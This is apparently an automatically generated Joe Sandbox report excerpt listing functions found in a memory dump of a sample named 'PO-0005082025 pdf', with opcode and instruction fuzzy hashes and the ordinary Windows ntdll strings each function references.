Opcode Fuzzy Hash: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
Instruction Fuzzy Hash: 91414F75A0020DBBEB11DAD8C851FEEBBBCEB54705F14806AEA0DA7240D774DA448B50

Function 019D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 019D4172
LdrpResValidateFilePath Enter, xrefs: 019D4160
@, xrefs: 019D4225

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
Instruction ID: 209dc5b7c44760f3770bf9f831288cc5c0c80248ca936c41a7c36166f34aafed
Opcode Fuzzy Hash: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
Instruction Fuzzy Hash: 7F411331A003598BEB26DFE9C840BADBBB8FFA5340F14445ADA49FBB91D7348901CB51

Function 019C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 019C4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019C4888
LdrpCheckRedirection, xrefs: 019C488F

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
Instruction ID: 8d22a90f908aa216d366c49d324148e9dd1d69e27dc8c51036b2e857a7940ac4
Opcode Fuzzy Hash: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
Instruction Fuzzy Hash: 89419D32B046519BDB22CE68D860A27BBE8AF89E51B05066DFDCC97255D730E801CB93

Function 01950BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019A543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 019A5449
HEAP[%wZ]: , xrefs: 019A5431

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
Instruction ID: 2ffaeed25977beeb7884c48463f9fe15ac744010b6a9afaaca72d0d1ccab7634
Opcode Fuzzy Hash: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
Instruction Fuzzy Hash: 6B11E1323141029FEB69CB18C481F7AB3E9EF80B1AF1A8519F80EDB251DB30D849C791

Function 019C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 019C20FA
Process initialization failed with status 0x%08lx, xrefs: 019C20F3
minkernel\ntdll\ldrinit.c, xrefs: 019C2104

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
Instruction ID: bd7553582a527c1e701d2931248374985cfe8dfbedf3e226caadfc0f48798c16
Opcode Fuzzy Hash: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
Instruction Fuzzy Hash: EBF0AF39A40318ABEA24EB4C9D46FA93B6CFB81E54F100069F64867285D2E0A941C792

Function 019503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019A4D8A

Strings

#%u, xrefs: 019A4D82

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
Instruction ID: 6a3065ca65c623510c8a0b0ffad245c3a72d7fb75bbfd9d1e2381460e94ffc69
Opcode Fuzzy Hash: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
Instruction Fuzzy Hash: 30714C71A0014A9FDB01DF98C980FAEBBF8BF48744F194065E909A7251E674EE05CBA1

Function 0194A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0194AA13
LdrResSearchResource Exit, xrefs: 0194AA25

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
Instruction ID: 504aff2f34a9a8b67f6ddc204f82518cfce05dc1290574dbbe9e9387ccef7b98
Opcode Fuzzy Hash: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
Instruction Fuzzy Hash: FFE18271E802199FEB22CF99C980FAEBBBEFF54311F50442AE90AE7251D7349944CB50

Function 01A0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A0A44B
`, xrefs: 01A0A551

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 180b1c94abb03f8c75ec0fa4180756701f78bb89244d64de1a0699537963e1b6
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 5DC19F312043429BE726CF28D841B6BBBE5AFC4318F188A2DF696CB2D1D775E505CB41

Function 019BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 019BE75A
UEFI, xrefs: 019BE751

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
Instruction ID: bb6f964ab13ea882953204992d8b34d36bce3cdf00f6b4b0320768528f472ae5
Opcode Fuzzy Hash: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
Instruction Fuzzy Hash: 31614A71E006199FDB15DFA88980BEEBBB9FB48700F14846DE65DEB251D731A900CB51

Function 019E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 019E4525
@, xrefs: 019E4437

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
Instruction ID: 50f052725fb6c43b7cd57cddc53e8e6ba7eb4d9fa1ca0af1d446dfe98565e9eb
Opcode Fuzzy Hash: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
Instruction Fuzzy Hash: 4851FA71E0021DAFDB11DFA9CC94EEEBBFDAB44754F100529E619F7250D6309905CB60

Function 019404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0194063D
kLsE, xrefs: 01940540

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
Instruction ID: 765db01008f92531c76ce721210b54467943aa506b19d595a5163b53c24140df
Opcode Fuzzy Hash: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
Instruction Fuzzy Hash: F351BB715047429BD724EF69C440AE7BBE8AF84305F18893EFAAE87241E770D545CB92

Function 0194A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0194A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0194A2FB

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
Instruction ID: 852fa0bb6b1a999bac4379e7027f4b7a6ecbc39595c516cf989a78bf9e18ab64
Opcode Fuzzy Hash: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
Instruction Fuzzy Hash: 0241F330A44649CFEB25CF59C440F6DBBB8FF85701F144469E90ADB291E375D940CB80

Function 0197A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0197A5E4
Threadpool!, xrefs: 0197A5E9

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
Instruction ID: 680078c1118b86c2f4c37fda896333582503475cffd3559a155fdbc543995b88
Opcode Fuzzy Hash: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
Instruction Fuzzy Hash: B901ADB2240704AFE312DF14CD46B1A77E8EB85715F058939A64CC7190E334D904CB46

Function 0194C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0194C8C3, 0194CA40

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
Instruction ID: 67fdc52ee4f838634fcceaf404442a340fdc86313b403f8134b771cf3d965220
Opcode Fuzzy Hash: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
Instruction Fuzzy Hash: C8826A79E012198FEB25CFA9C880FEDBBB5BF48710F14816AE95DAB391D7309941CB50

Function 019C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 019C65C1

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
Instruction ID: 75abaf251f20eb36666d90271c551ce8a40683d00998c1d5fe02faec6f71f22d
Opcode Fuzzy Hash: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
Instruction Fuzzy Hash: D8918471900219AFEB21DF95CD85FAEBBB8EF54B50F100059F609BB291D774AD00CB61

Function 019EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 019EE1FA

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
Instruction ID: fcb7212772e7c38742724ad6eae1de7bac44871b43239b970c0ae98d70819a2a
Opcode Fuzzy Hash: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
Instruction Fuzzy Hash: 85917E3190064ABADB23EFA5DC48FAFBBB9EF85740F140029F509A7250EB759905CB90

Function 0197A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 019B67C9

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
Instruction ID: de37f496e2b533ad34983d80104e5cf5b73a3cc631d1fce36db3482d960ddc18
Opcode Fuzzy Hash: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
Instruction Fuzzy Hash: 21715DB5E0021A9BDF28CF99C6D0AEDBBB5BF88711F14812EE509A7241E731A941CB50

Function 019E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 019E4A7F

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
Instruction ID: cc564d65daf1dc9d2f098b5fad0ca9c5b0689538ca7f6956d112df7bc5d5a841
Opcode Fuzzy Hash: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
Instruction Fuzzy Hash: A4519472D0022A9BDF12DF99D848EAEBBF9BF44A50F054169E919FB300D7349901CBE4

Function 0195E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0195E6A4

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 5e1b28b02f0d0f3afbcf3c0f30e8337a4e7e2d3a89b185714450945da0842c61
Instruction ID: c055e51af1b13b50793cc57f46c8f636de094e38ebb8192fea92d0a8f8f1fb94
Opcode Fuzzy Hash: 5e1b28b02f0d0f3afbcf3c0f30e8337a4e7e2d3a89b185714450945da0842c61
Instruction Fuzzy Hash: 55417F72508306ABD751DA75C880B6BFBECAFC8714F44092DBE8CE7140E675DA04C7A6

Function 019BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 019BC77F

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
Instruction ID: 52f8611b1648367e1d1c3de1b2901df017e1bda246ecfc5286e2bcacfedfb705
Opcode Fuzzy Hash: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
Instruction Fuzzy Hash: 634151B1D0022DABDB21DB60CD84FDEB77CAB85714F0045A5EA0CAB140DB709E89CFA5

Function 019D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 019D6B91

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
Instruction ID: 7f4e40793478cbb4da1cd320ea9b6341bc849921ceb2e172ae4ae32843e63843
Opcode Fuzzy Hash: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
Instruction Fuzzy Hash: 76310731E007599BEB22DF79C854BEE7BBCDF54704F148028EA49AB282D775E805CB90

Function 019BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 019BCAA2

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 6ff8c96a25dce915a51e852c340d031af4c543e3bb7f6b2ff18026b1cac9bb90
Instruction ID: 89a24bfe560b24eea03481ca348022d53945d0e34117a11b5217cc11beda29c7
Opcode Fuzzy Hash: 6ff8c96a25dce915a51e852c340d031af4c543e3bb7f6b2ff18026b1cac9bb90
Instruction Fuzzy Hash: 58310B36900529BFEB15DB59C995EBFBB74EF80750F114129E909AB250D730EE04D7D0

Function 019C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019C895E

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
Instruction ID: e7944604a3352d37c1368974327f613640b1033d217c0b46dfd6afc2e270399c
Opcode Fuzzy Hash: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
Instruction Fuzzy Hash: 8F01F736600211ABE6209B999C85FD67B69FFC1F55F04041CF6CE16151CB30A841C797

Function 019E2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
Instruction ID: a1c7ffe2dfcfba477e07b0caa01e122de6f46ff68091b6b601257b5f34c78513
Opcode Fuzzy Hash: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
Instruction Fuzzy Hash: F842C4716083419BE726CF68C894A6FBBEDBFC8740F08092DFA8A97250D771D945CB52

Function 019D8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
Instruction ID: fe9d44f49ff56bc59288bb77c7159e1a1e3bd6725b49a1ced93e16aecff1b50b
Opcode Fuzzy Hash: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
Instruction Fuzzy Hash: 26426C75E002199FEB25CF69C841BADBBF9BF88311F15C099E94CAB242D7349985CF60

Function 01952840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
Instruction ID: cfda5ae65dcf6d6d187767f2c2dc464f1ef0f64df09109ee0d2971f4e775467e
Opcode Fuzzy Hash: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
Instruction Fuzzy Hash: 5E320F70A007458FEB25CF69C854BBEBBFABF84704F58451DD58E9B284D735A80ACB90

Function 019EA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
Instruction ID: 57ae6b6e5edae3c01e1275b86a30a9455e025a7e2d2ce759261875deb06dabb4
Opcode Fuzzy Hash: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
Instruction Fuzzy Hash: F722F4746046618FEB26CF2DC098776BBF5BF45701F088859E98E8F2A6E735D442CB60

Function 01968DBF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f7a260168c6c4d6a541f158d18ce0d649ea7b1394e35784504d3122326aa03
Instruction ID: 290d522bb44241b361f0113b9eac950dd98a6586c9b875492bf3bd3962a396cf
Opcode Fuzzy Hash: 99f7a260168c6c4d6a541f158d18ce0d649ea7b1394e35784504d3122326aa03
Instruction Fuzzy Hash: ED225F70E0021ADBCF15CF99C4809BEFBFABF88715B54845AE9499B641E734ED41CBA0

Function 01946A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
Instruction ID: 1e85c6699058995a8f7fd272d40c2abba240b7a372e3f36ac99da54bd69b612b
Opcode Fuzzy Hash: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
Instruction Fuzzy Hash: 5832AFB1A04605CFDB25CF68C880FAABBF5FF49301F148969E959AB351D734E845CB90

Function 01964A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 595ce7ee7d12423a0485f9ed7113efa8d81932311647a1d0f65bcf704d227a94
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 70F17171E0021A9BDB15CFE9C590BAEBBFDBF48714F058129E909AB344D774E841CBA0

Function 019D892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
Instruction ID: e647de04a17dc4520849babe3de0bbd29691871cf6e364c5955c4170b8810767
Opcode Fuzzy Hash: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
Instruction Fuzzy Hash: E3D10171E0060A9BDF05CFA9C841BFEB7F5AF88304F18C569D959A7282D739E905CB60

Function 019465D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
Instruction ID: 4358bff50db001bce2efa8e541fcd104c44426b6b46614b5bfd4c1862399cad5
Opcode Fuzzy Hash: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
Instruction Fuzzy Hash: 99E180B5508342CFC715CF28C490E6ABBE4FF8A314F058A6DE99997351E731E909CB92

Function 01938397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
Instruction ID: 555d475535a76c378973ad75d59689be8f9a4a1f4fc4372273864ba3a0fbbfb6
Opcode Fuzzy Hash: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
Instruction Fuzzy Hash: 27D1CF71A0020A9BDF15DF68D880EBA77AABFD4714F04462DF91EDB280E734E951CB90

Function 019C8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 2e828ba19048224094df60e63efb4c9f180ac0fcc4ca02e76e3981af6420e96f
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
